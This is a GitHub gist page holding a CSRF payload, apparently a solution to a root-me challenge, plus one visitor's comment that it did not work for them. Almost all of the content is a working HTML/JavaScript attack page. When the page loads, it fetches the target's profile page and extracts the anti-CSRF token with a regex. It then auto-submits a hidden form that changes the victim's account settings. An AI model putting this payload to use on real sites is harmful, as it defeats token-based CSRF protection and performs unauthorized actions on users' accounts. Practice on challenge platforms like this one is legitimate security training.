Skip to content

Instantly share code, notes, and snippets.

@vkobel

vkobel/payload.html

Created February 19, 2016 09:58
Show Gist options
  • Save vkobel/4de2c7afc62f057d52fd to your computer and use it in GitHub Desktop.
Save vkobel/4de2c7afc62f057d52fd to your computer and use it in GitHub Desktop.
Download ZIP
CSRF payload for token based mechanism (root-me sample)
Raw
payload.html
<body onload="get()">
<form id="form-payload" action="?action=profile" method="POST" enctype="multipart/form-data">
<input type="hidden" name="username" value="your_username"/>
<input type="hidden" name="status" value="on"/>
<input type="hidden" id="forged-token" name="token" value=""/>
<input type="submit" value="go"/>
</form>
<script>
var x = new XMLHttpRequest();
function get() {
x.open("GET","?action=profile",true);
x.send(null);
}
x.onreadystatechange = function() {
if (x.readyState == XMLHttpRequest.DONE) {
var token = x.responseText.match(/name="token" value="(.+)"/)[1];
document.getElementById("forged-token").value = token;
document.getElementById("form-payload").submit();
}
}
</script>
@Matias-ISCTEIUL
Copy link

I tryed everything! I even copies this and got nothing. Can you explain it to me please?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment